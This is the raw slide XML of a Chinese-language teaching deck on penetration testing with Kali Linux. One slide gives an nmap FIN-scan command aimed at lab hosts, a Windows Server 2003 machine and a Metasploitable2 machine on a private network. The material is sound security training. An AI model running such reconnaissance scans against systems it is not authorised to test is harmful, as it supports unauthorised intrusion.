                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518795" y="3543935"/>
            <a:ext cx="5126990" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用“nmap -sF 192.168.172.129”命令对目标主机进行FIN扫描，因为这台Windows Server 2003不支持RFC 793规定，所以对另一台Metasploitable2主机进行扫描，使用“nmap -sF 192.168.172.131”扫描，如图2-2-49所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="713423"/>
            <a:ext cx="5219700" cy="5162550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6159500" y="5887403"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-49 nmap对Linux主机进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5590261" y="1577791"/>
            <a:ext cx="5193030" cy="4163060"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5193030" cy="4163060"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4527550" cy="3830955"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>如果你负责一个网络公司的网络安全工作，在定期更新安全策略和程序，时时给系统打补丁，并采用了安全软件，以确保所有补丁都已打上了。这时，还需要进行专业的渗透测试来独立地检查你的网络安全策略和安全状态是否达到了期望。这就需要使用Kali Linux这个专门用于渗透测试的操作系统。本实例将完成Kali Linux的常用操作和软件包管理。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="2468880" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>常用操作和软件包管理</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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22" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
